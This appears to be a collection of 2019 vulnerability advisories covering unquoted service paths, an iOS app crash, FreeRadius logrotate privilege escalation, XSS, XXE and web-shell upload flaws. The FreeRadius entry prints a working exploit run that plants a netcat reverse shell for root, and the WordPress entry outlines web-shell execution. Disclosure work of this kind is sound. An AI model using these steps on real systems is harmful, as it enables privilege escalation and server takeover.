ASUS HM Com Service version 1.00.31 suffers from an unquoted service path vulnerability.

MD5 | 31437721397cd7ab5ed7a866bcf4174e

# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
# Date: 2019-11-16
# Exploit Author : Olimpia Saucedo
# Vendor Homepage: www.asus.com
# Version: 1.00.31
# Tested on: Windows 10 Pro x64 (but it should works on all windows version)

The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.

POC:

>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:Windows\" | findstr /i /v """

ASUS HM Com Service asHmComSvc
C:Program Files (x86)ASUSAAHM1.00.31aaHMSvc.exe
Auto

>sc qc "asHMComSvc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: asHMComSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)ASUSAAHM1.00.31aaHMSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ASUS HM Com Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem

Source

Emerson PAC Machine Edition version 9.70 build 8595 suffers from an unquoted service path vulnerability.

MD5 | 4104203b4fbc0492e2def98177a6c68f

# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-17
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.70 Build 8595
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:Windows\" | findstr /i "FxControlRuntime" |findstr /i /v """

FxControl Runtime FxControlRuntime C:Program Files (x86)EmersonPAC Machine EditionfxControlRuntimeNTFxControl.exe Auto

# Service info:

C:>sc qc FxControlRuntime
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FxControlRuntime
TYPE : 120 WIN32_SHARE_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)EmersonPAC Machine EditionfxControlRuntimeNTFxControl.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FxControl Runtime
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Source

NCP_Secure_Entry_Client version 9.2 suffers from multiple unquoted service path vulnerabilities.

MD5 | 9739ded1d46fec83cc8bd382b852a350

# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
# Date: 2019-11-17
# Exploit Author: Akif Mohamed Ik
# Vendor Homepage: http://software.ncp-e.com/
# Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
# Version: 9.2x
# Tested on: Windows 7 SP1
# CVE : NA
C:Usersuser>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:Windows\" | findstr /i /v """

ncprwsnt ncprwsnt
C:Program Files (x86)NCPSecureClientncprwsnt.exe
Auto
rwsrsu rwsrsu
C:Program Files (x86)NCPSecureClientrwsrsu.exe
Auto
ncpclcfg ncpclcfg
C:Program Files (x86)NCPSecureClientncpclcfg.exe
Auto
NcpSec NcpSec
C:Program Files (x86)NCPSecureClientNCPSEC.EXE
Auto

C:UsersADMIN>sc qc ncprwsnt
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ncprwsnt
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)NCPSecureClientncprwsnt.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ncprwsnt
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:UsersADMIN>sc qc rwsrsu
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME : rwsrsu
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)NCPSecureClientrwsrsu.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : rwsrsu
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:UsersADMIN>sc qc ncpclcfg
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME : ncpclcfg
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)NCPSecureClientncpclcfg.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ncpclcfg
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:UsersADMIN>sc qc NcpSec
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME : NcpSec
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)NCPSecureClientNCPSEC.EXE
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NcpSec
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.

Source

iSmartViewPro version 1.3.34 suffers from a denial of service vulnerability.

MD5 | e7e4dac447b9ef691456dcc0b51eaee4

# Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019 -11-16
# Vendor Homepage: http://www.smarteyegroup.com/
# Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071
# Tested Version: 1.3.34
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s - iOS 13.2

##############################################################################################################################################

Summary: This app is specially built for P2P IP camera series. thanks to unique P2P connection technology that users are able to watch live
video on iPhone from any purchased IP camera by simply enter camera's ID and password; no complex IP or router settings. The app have a lot of
functions, such as local record video, set ftp params, set email, set motion alarm and so on.

##############################################################################################################################################

Steps to Produce the Crash:

1.- Run python code: iSmartViewPro.py
2.- Copy content to clipboard
3.- Open App "iSmartViewPro"
4.- Go to "Add Camera"
5.- go to "Add network cameras"
6.- Paste ClipBoard on "Camara DID"
7.- Paste ClipBoard on "Password"
8.- Next
9.- Crashed

##############################################################################################################################################

Python "iSmartViewPro" Code:

buffer = "x41" * 257
print (buffer)

##############################################################################################################################################

Source

FreeRadius versions 3.0.19 and below suffer from a privilege escalation vulnerability via insecure logrotate use.

MD5 | 38f7cd44ce6153a2cf84f8f2f5819066

# Privilege Escalation via Logrotate in FreeRadius

## Overview
Identifier: AIT-SA-20191112-01
Target: FreeRadius
Vendor: FreeRadius
Version: all versions including 3.0.19
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[FreeRadius is a modular Open-Source RADIUS suite.](https://freeradius.org/)

## Vulnerability Description
The ownership of the logdirectory "radacct" belongs to user "radiusd". User "radiusd" can elevate the privileges to "root" because of an unsafe interaction with logrotate.
User "radiusd" owns the log directory /var/log/radius/radacct:

```
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```
Log files rotate once a day(or any other frequency if configured) by logrotate as user root. The configuration does not use the "su" directive:

```
/var/log/radius/radacct/*/detail {
monthly
rotate 4
nocreate
missingok
compress
}
```

Since logrotate is prone to a race-condition(see https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition) it is possible for user "radiusd" to replace the

directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example /etc/bash_completion.d). logrotate will place the compressed files AS ROOT into /etc/bash_completition.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.

Details of the race-condition in logrotate can be found at:

* https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
* https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
* https://github.com/whotwagner/logrotten

## Proof of Concept
The following example illustrates how an attacker who already gained a shell as user "radiusd", can elevate his privileges to "root". After downloading and compiling, the exploit gets executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file that contains the reverse shell payload, will be written into /etc/bash_completition.d/ with owner "radiusd". As soon as root logs in, the reverse shell gets executed and opens a shell on the attackers netcat listener:

```
radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to /etc/bash_completion.d
Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 11144 Oct 28 2018 grub
-rw-r--r-- 1 radiusd radiusd 33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &); fi" > /etc/bash_completion.d/detail.1.gz
radiusd@redhat7:/tmp/logrotten$ nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```

## Vulnerable Versions
All versions including 3.0.19

## Tested Versions
Name : freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5

## Impact
An attacker who already achieved a valid shell as user "radiusd" could elevate the privileges to "root". The fact that another exploit is needed to get a shell lowers the severity from high to low.

## Mitigation
Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd.
By keeping SELinux in "Enforcing" mode, the "radiusd" user will be limited in the directories he can write to.

## References:
* https://access.redhat.com/security/cve/cve-2019-10143
* https://nvd.nist.gov/vuln/detail/CVE-2019-10143

## Vendor Contact Timeline

* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure

## Notes
This CVE is disputed because the vendor [stated that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user "radiusd"]( https://freeradius.org/security/). CVE's are not only assigned for vulnerabilities but also for exposures that allow attacker to have a stronger impact after a successful attack. Therefore we believe that it is important to file this issue as a security related bug.

## Advisory URL
https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius


Source

Raritan CommandCenter Secure Gateway versions prior to 8.0.0 suffer from a cross site scripting vulnerability.

MD5 | a71df70e983939b7c7a0b9688e5bed94

I. VULNERABILITY
-------------------------
XSS Vulnerability on Raritan CommandCenter Secure Gateway

II. CVE REFERENCE
-------------------------
-

III. VENDOR
-------------------------
https://www.raritan.com/support/product/commandcenter-secure-gateway

IV. TIMELINE
-------------------------
30/01/2019 Vulnerability discovered
30/01/2019 Vendor contacted
27/02/2019 Raritan replied as "this fix is scheduled for release version 8.0"
06/05/2019 Version 8.0 is released

V. CREDIT
-------------------------
Okan Coşkun from Biznet Bilisim A.S.
Alp Hısım from Biznet Bilisim A.S.

VI. DESCRIPTION
-------------------------
Prior versions of Raritan CommandCenter Secure Gateway 8.0 affected
from XSS vulnerability. A remote attacker could steal victims cookie
or redirect victim to malicious site.

VII. PROOF OF CONCEPT
-------------------------
Affected Component:
Path(inurl): /access/MacroFileUploadServlet
Affected parameter: macroFile

MacroFileUpload of Raritan CC-SG affected from XSS vulnerability. A
remote attacker could steal victims cookie or redirect victim to
malicious site.


Source

Raritan CommandCenter Secure Gateway versions prior to 8.0.0 suffer from an XML external entity injection vulnerability. A remote unauthenticated attacker may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts by using this vulnerability.

MD5 | a8abaee9db2d00c3085d72665c4b527a

I. VULNERABILITY
-------------------------
Raritan CommandCenter Secure Gateway XML External Entity

II. CVE REFERENCE
-------------------------
CVE-2018-20687

III. VENDOR
-------------------------
https://www.raritan.com/support/product/commandcenter-secure-gateway

IV. TIMELINE
------------------------
04/01/2019 Vulnerability discovered
07/01/2019 Vendor contacted

V. CREDIT
-------------------------
Okan Coşkun from Biznet Bilisim A.S.
Faruk Ünal From Biznet Bilisim A.S.

VI. DESCRIPTION
-------------------------
Raritan CommandCenter Secure Gateway version prior 8.0.0 affected by
XXE. A remote unauthenticated attacker may lead to the disclosure of
confidential data, denial of service, server side request forgery,
port scanning from the perspective of the machine where the parser is
located, and other system impacts by using this vulnerability.

Vulnerable path: /CommandCenterWebServices/.*

VII. SOLUTION
-------------------------
Update current CommandCenter Secure Gateway

VIII. REFERENCES
-------------------------

You can find more information about XXE from the link below:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing


Source

TP-Link Archer VR300 version 1 suffers from a persistent cross site scripting vulnerability.

MD5 | d679321fdc207a974641a756b1e35bb0

I. VULNERABILITY
-------------------------
Stored XSS Vulnerability on TP-Link Archer VR300 v1 - firmware
version: 1.3.0 0.8.0 v007b.1 build 180905 Rel.55344n

II. CVE REFERENCE
-------------------------
-

III. VENDOR
-------------------------
https://www.tp-link.com/

IV. TIMELINE
-------------------------
04/10/2018 Vulnerability discovered
05/10/2018 Vendor contacted
no Response

V. CREDIT
-------------------------
Okan Coşkun from Biznet Bilisim A.S.
Halil Arı From Biznet Bilisim A.S

VI. DESCRIPTION
-------------------------
Tp-Link Router interface is affected by stored XSS vulnerability. A
remote attacker could steal victims cookie or redirect victim to
malicious site.

VII. PROOF OF CONCEPT
-------------------------
Affected Component: VPN Name
Path(inurl): /cgi?3
Affected parameter: connName

On TP-Link Router Interface adding VPN configurations with malicious
VPN Name could execute arbitrary javascript.


Source

WordPress Social Gallery plugin version 1.0 suffers from a remote code execution vulnerability.

MD5 | 1bb9591e3cec19df6dd4e98eaea723af


=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised: November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution

II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images
deserve to be experienced and shared, to spark a response as they travel
the social web, and to work for you by generating more fans and more Likes
for your content.

III. DESCRIPTION
-------------------------
The version of WordPress Plugin Social Photo Gallery is affected by a
Remote Code Execution vulnerability.

The application does not check the extension when a imagen of a album is
uploaded, resulting in a execution of php code.

To exploit the vulnerability only is needed create a album in the
application and attach a malicious php file in the cover photo album.

IV. PROOF OF CONCEPT
-------------------------

1. Create a .php archive (cmd.php):



2. Click Add Album, select the name, for example "demo" and in the "Cover
Photo" select the cmd.php file.

3. Load the next URL and magic:

http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls

V. BUSINESS IMPACT
-------------------------
Execute local commands in the server result from these attacks.

VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0

VII. SOLUTION
-------------------------
The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad
Email: info@prestigiaonline.com

X. REVISION HISTORY
-------------------------
July 31, 2019 1: Initial release
November 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad
July 31, 2019 2: Email to vendor without response
August 15, 2019 3: Second email to vendor without response
November 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/


Source

Centraleyezer suffers from a remote shell upload vulnerability.

MD5 | f78de30c506095184f3833df70fa0eb0

Centraleyezer: Unrestricted File Upload -[CVE-2019-12271]

Sandline Centraleyezer (On Premises) allows unrestricted File Upload with a dangerous type, because the feature of adding “.jpg” to any uploaded filename is not enforced on the server side.

The image upload is vulnerable to bypass, the file upload adds .jpg extension to every file sent, but on client side, so I could intercept the request and change it to .php. I uploaded a simple shell and was able to execute commands as user www-data on the server.

more information:

https://link.medium.com/Y2S4ZJbMy1


Source